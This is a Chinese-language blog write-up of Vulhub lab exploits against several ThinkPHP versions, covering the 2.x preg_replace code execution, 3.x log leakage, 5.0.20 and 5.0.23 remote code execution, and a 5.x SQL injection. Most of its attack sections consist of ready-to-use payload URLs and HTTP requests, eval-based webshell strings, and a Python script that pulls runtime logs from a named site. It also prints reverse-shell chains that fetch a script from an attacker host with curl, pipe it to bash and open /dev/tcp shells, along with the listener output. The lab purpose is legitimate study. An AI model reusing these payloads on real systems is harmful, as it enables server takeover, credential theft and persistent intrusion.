首页 > 编程语言 >Vulhub 漏洞学习之:ThinkPHP

Vulhub 漏洞学习之:ThinkPHP

时间:2023-04-22 19:47:59浏览次数:65  
标签:Vulhub www http 192.168 漏洞 ThinkPHP 8080

Vulhub 漏洞学习之:ThinkPHP

目录

0 利用工具

1 ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由,导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

  • 存在漏洞的文件:/ThinkPHP/Lib/Think/Util/Dispatcher.class.php

  • 漏洞代码位置

// Dispatcher.class.php中static public function dispatch()  第102行

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
  • 漏洞代码块
        if(!self::routerCheck()){   // 检测路由规则 如果没有则按默认规则调度URL
            $paths = explode($depr,trim($_SERVER['PATH_INFO'],'/'));
            $var  =  array();
            if (C('APP_GROUP_LIST') && !isset($_GET[C('VAR_GROUP')])){
                $var[C('VAR_GROUP')] = in_array(strtolower($paths[0]),explode(',',strtolower(C('APP_GROUP_LIST'))))? array_shift($paths) : '';
                if(C('APP_GROUP_DENY') && in_array(strtolower($var[C('VAR_GROUP')]),explode(',',strtolower(C('APP_GROUP_DENY'))))) {
                    // 禁止直接访问分组
                    exit;
                }
            }
            if(!isset($_GET[C('VAR_MODULE')])) {// 还没有定义模块名称
                $var[C('VAR_MODULE')]  =   array_shift($paths);
            }
            $var[C('VAR_ACTION')]  =   array_shift($paths);
            // 解析剩余的URL参数
            $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
            $_GET   =  array_merge($var,$_GET);
        }
  • 漏洞解析:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

# preg_replace()函数执行一个正则表达式的搜索和替换。
<?php
$aaa = @preg_replace('/a/i','print("hello world!");','abc');
echo $aaa;
echo "\n";
$bbb = @preg_replace('/a/e','print("hello world!");','abc');
echo $bbb;

# 输出:
print("hello world!");bc
hello world!1bc

# /(\w+)\/([^\/])/ies 表示是取每两个参数,[^\/]表示查找除中括号内("\/")外的任何字符
<?php
$var = array();
$s = 'a/b/c/d/e/f/g';
preg_replace("/(\w+)\/([^\/])/ies", '$var[\'\\1\']="\\2";', $s);
print_r($var);

?>
# 输出
Array
(
    [a] => b
    [c] => d
    [e] => f
)
  • 修饰符可以改变搜索的执行方式。

    修饰符 描述
    i 执行不区分大小写的搜索
    m 执行多行搜索(搜索字符串开头或结尾的模式将匹配每行的开头或结尾)
    u 启用 UTF-8 编码模式的正确匹配
    e 为PHP专有参数,表示可执行模式
  • PHP语法:在PHP中${}里面可以执行函数

  • ThinkPHP的url规则:

    • thinkphp 所有的主入口文件默认访问index控制器(模块)

    • thinkphp 所有的控制器默认执行index动作(方法)

    • 存在漏洞的static public function dispatch(),叫URL映射控制器,也就是URL访问的路径是映射到哪个控制器下。

    • ThinkPHP5.1在没有定义路由的情况下典型的URL访问规则是:

      http://server-ip/index.php(或者其它应用入口文件)/模块/控制器/操作/[参数名/参数值...]
      
      # 如果不支持PATHINFO的服务器可以使用兼容模式访问如下:
      http://server-ip/index.php(或者其它应用入口文件)?s=/模块/控制器/操作/[参数名/参数值...]
      
  • ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

1.1 环境安装

docker-compose up -d
  • 环境启动后,访问http://your-ip:8080即可查看到默认页面。

1.2 漏洞利用过程

  1. 验证是否存在漏洞

    http://192.168.50.4:8080/?s=/Index/index/name/${@phpinfo()}

1.3 GetShell

  1. GetWEBShell

    # 使用蚁剑输入以下url连接目标主机
    http://192.168.50.4:8080/?s=/Index/index/name/${@print(eval($_POST[acmd]))}
    
  2. 反弹shell

    # bp中将GET请求转换为POST
    POST /?s=a/b/c/${@print(eval($_POST[1]))} HTTP/1.1
    
    # 再添加请求主体反弹shell
    1=system("curl 192.168.50.2:8080/sh.sh | bash");
    
    # http://192.168.50.2:8080/sh.sh 内容
    bash -i >& /dev/tcp/192.168.50.2/2333 0>&1
    
    
    ┌──(root㉿kali)-[~]
    └─# nc -nvlp 2333
    listening on [any] 2333 ...
    connect to [192.168.50.2] from (UNKNOWN) [192.168.50.4] 57928
    bash: cannot set terminal process group (1): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@54abd56c2a0b:/var/www/html$ id
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@54abd56c2a0b:/var/www/html$ 
    

2 ThinkPHP 3.x

2.1 ThinkPHP 3.x 日志泄露漏洞

2.1.1 漏洞原理

  • ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关
  • ThinkPHP默认安装后,也会在Runtime目录下生成日志
  • 日志很容易被猜解到,而且日志里面有执行SQL语句的记录

2.1.2 漏洞利用过程

  1. 日志存储结构:

    #  :项目名\Runtime\Logs\Home\年份_月份_日期.log
    THINKPHP3.2 日志结构:Application\Runtime\Logs\Home\16_09_09.log
    THINKPHP3.1 日志结构:Runtime\Logs\Home\16_09_09.log
    
  2. 尝试构造访问当天的thinkphp日志:确认存在日志泄露漏洞

    image-20221024123929941

  3. Python 遍历所有日志:

    import requests
    import sys
    
    
    def logfile(year):
        """
        python输出00,01,02或001,002,003等格式字符串
        rjust() 方法会返回一个原字符串右对齐,并使用空格填充至长度 width 的新字符串。
        如果指定的长度小于字符串的长度则返回原字符串
        注意:int格式的不支持使用rjust方法,可以先用str函数转化为string字符串
        :param year:
        :return:
        """
        logfilename = []
        for m in range(1, 13):
            for d in range(1, 32):
                m = str(m).rjust(2, '0')
                d = str(d).rjust(2, '0')
                logfilename.append("%s_%s_%s.log" % (year, m, d))
        return logfilename
    
    
    def main():
        year = sys.argv[1]
        print(year)
        logfilename = logfile(year)
        for logname in logfilename:
            url = "http://www.webhack123.com/App/Runtime/Logs/" + logname
            r = requests.get(url)
            if r.status_code == 200:
                print(url)
                with open(logname, "w", encoding="utf-8") as f:
                    f.write(r.text)
    
    
    if __name__ == '__main__':
        main()
    
    
    • 在日志中发现了用户历史登录日志:

      image-20221025100243232

  4. 解密MD5:74c774ef39b5b977c1fd59dbfc73c3e380a65aa3的明文密码是:web123

  5. 成功进入后台:

    image-20221025100441253

  6. 在后台修改允许上传文件类型后,上传一句话木马,成功连接WebShell

    image-20221025102049121

    image-20221025102331350

  7. 上传CS反弹Payload,并执行,成功上线CS

    image-20221025105308391

3 ThinkPHP5 5.0.20远程代码执行漏洞

版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

参考链接:

3.1 环境安装

运行ThinkPHP 5.0.20版本:

docker-compose up -d
  • 环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

3.2 漏洞利用过程

  1. 执行phpinfo:http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
  2. 执行系统命令:http://192.168.50.4:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  3. 查看数据库用户:http://192.168.50.4:8080/?s=.|think\config/get&name=database.username
  4. 查看数据库密码:http://192.168.50.4:8080/?s=.|think\config/get&name=database.password

3.3 GetShell

  1. 执行命令:

    http://192.168.50.4:8080/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20192.168.50.2:8080/sh.sh%20|%20bash
    
    # http://192.168.50.2:8080/sh.sh 内容
    bash -i >& /dev/tcp/192.168.50.2/2333 0>&1
    
    ┌──(root㉿kali)-[~]
    └─# nc -nvlp 2333
    listening on [any] 2333 ...
    connect to [192.168.50.2] from (UNKNOWN) [192.168.50.4] 39812
    bash: cannot set terminal process group (1): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@dc116179634e:/var/www/public$ id
    id
    uid=33(www-data) gid=33(www-data) groups=33
    

4 ThinkPHP5 5.0.23 远程代码执行漏洞

其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

4.1 环境安装

执行如下命令启动一个默认的thinkphp 5.0.23环境:

docker-compose up -d

环境启动后,访问http://your-ip:8080即可看到默认的ThinkPHP启动页面。

4.2 漏洞利用过程

  1. 使用BP发送如下请求执行命令

    POST /index.php?s=captcha HTTP/1.1
    Host: Your-IP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    DNT: 1
    Sec-GPC: 1
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 72
    
    _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
    

    image-20230419224457244

4.3 GetShell

  1. 使用如下命令反弹shell

    POST /index.php?s=captcha HTTP/1.1
    Host: 192.168.50.4:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    DNT: 1
    Sec-GPC: 1
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 105
    
    _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.50.2:8080/sh.sh | bash
    
    # http://192.168.50.2:8080/sh.sh 内容
    bash -i >& /dev/tcp/192.168.50.2/2333 0>&1
    
    ┌──(root㉿kali)-[~]
    └─# nc -nvlp 2333
    listening on [any] 2333 ...
    connect to [192.168.50.2] from (UNKNOWN) [192.168.50.4] 58484
    bash: cannot set terminal process group (1): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@635148ae2996:/var/www/public$ id
    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

5 ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

漏洞原理说明:

5.1 环境安装

运行环境:

docker-compose up -d

启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出来,说明环境运行成功。

5.2 漏洞利用过程

  1. 访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,信息成功被爆出:

    当然,这是一个比较鸡肋的SQL注入漏洞。但通过DEBUG页面,我们找到了数据库的账号、密码:

    这又属于一个敏感信息泄露漏洞。

    image-20230421155644158

    image-20230421155753982

标签:Vulhub,www,http,192.168,漏洞,ThinkPHP,8080
From: https://www.cnblogs.com/f-carey/p/17343752.html

相关文章

  • 代理工具实战基础,SQL注入漏洞测试
    在Web安全课程中,“插件”是能够增强或丰富原有工具功能的小程序Firebug为Firefox浏览器提供了更加丰富的开发者工具箱(网络审查页面元素)HackBar为Firefox浏览器提供快速构造HTTP请求及多种编码变换的功能(构造数据包)AdvacedCookieManager:编辑Cookie类插件为Firefox浏览器提供快速修......
  • SQL注入漏洞--DVWA
    怎么判断sql注入漏洞呢?后台执行的SQL语句为SELECTfirst_name,last_nameFROMusersWHEREuser_id='$id';($id:用户输入的内容)用户输入的数据为:1'and1=1#这时SQL语句发生变化,在原有查询完成后会判断1=1(这明显是对的),如果判断正确才会有输出[#作用是注释(移除)后续SQL语......
  • ms14_064漏洞复现
    一、环境准备   win7虚拟机x1  kaliLinux虚拟机x1二、实验步骤1.打开kali虚拟机终端命令行输入以下命令启动metasploitmsfconsole2.输入以下命令搜索ms14漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/browser/ms14_064_ole_code_executionsearchms14......
  • jquery DOM型漏洞
    1、漏洞介绍漏洞编号:CVE-2016-7103、CVE-2015-9251、CVE-2014-6071、CVE-2012-6708、CVE-2011-4969漏洞环境:jquery影响范围:1.x系列版本等于或低于1.12的jQuery2.x系列版本等于或低于2.2的jQuery漏洞原理:$(val)形式的jquery代码,由于某些版本的jquery的解析规则存在漏洞,导......
  • Exp5 信息搜集与漏洞扫描
    Exp5信息搜集与漏洞扫描目录Exp5信息搜集与漏洞扫描1.实验过程记录1.1各种搜索技巧的应用使用GoogleHacking搜索网址目录结构利用搜索引擎的技巧路由侦查1.2DNSIP注册信息的查询whois查询nslookup查询dig域名查询IP2Location地理位置查询IP2反域名查询1.3基本的扫描技术:主机......
  • Exp5 信息搜集与漏洞扫描-20201324
    目录1各种搜索技巧的应用1.1搜索网址目录结构dir_listingbrute_dirs1.2利用搜索引擎的技巧普通检索采用字段设置1.3路由侦查2DNSIP注册信息的查询2.1whois查询2.2nslookup查询2.3dig域名查询2.4IP2Location地理位置查询2.5IP2反域名查询3基本的扫描技术:主机发现、端口......
  • Exp5 信息搜集与漏洞扫描
    目录一.实验信息二.实验内容三.实验知识四.实验过程4.1各种搜索技巧的应用4.1.1搜索网址目录结构4.1.2利用搜索引擎4.1.3路由侦查4.2DNSIP注册信息的查询4.2.1nslookup域名查询4.2.2whois域名查询4.2.3dig查询4.2.3利用IP查看地理位置4.3基本的扫描技术4.3.1主机发现4......
  • 20201226马瑞婕Exp5- 信息搜集与漏洞扫描
    20201226马瑞婕Exp5-信息搜集与漏洞扫描目录1各种搜索技巧的应用1.1搜索某一个网址目录结构1.2通过搜索引擎进行信息搜索1.3路由侦察二、DNSIP注册信息的查询2.1whois命令查询2.2nslookup、dig域名查询2.3IP2Location地理位置查询三、基本的扫描技术:主机发现、端口扫描......
  • 如何检查 Docker 镜像是否存在漏洞
    一.什么是Docker镜像今天我们来聊聊Docker镜像。你可能听过Docker,但是你知道什么是Docker镜像吗?如果你还不知道,别担心,今天我们用幽默的方式来解释一下首先,Docker镜像就像一份披萨的食谱。你可以把它看作是一个包含了所有制作披萨所需的材料和步骤的清单。类似地,Docker镜像包......
  • 文件上传漏洞
    基础知识上传文件,使用burp抓包,会出现如下两种情况:-①若burp抓到请求包: -则说明存在服务端检测, -可通过修改数据包中文件的content-type类型、修改filename为.htaccess、添加文件头GIF89a,等操作进行绕过。-②若burp未抓到请求包: -则说明存在前端检测, -需禁用浏览器......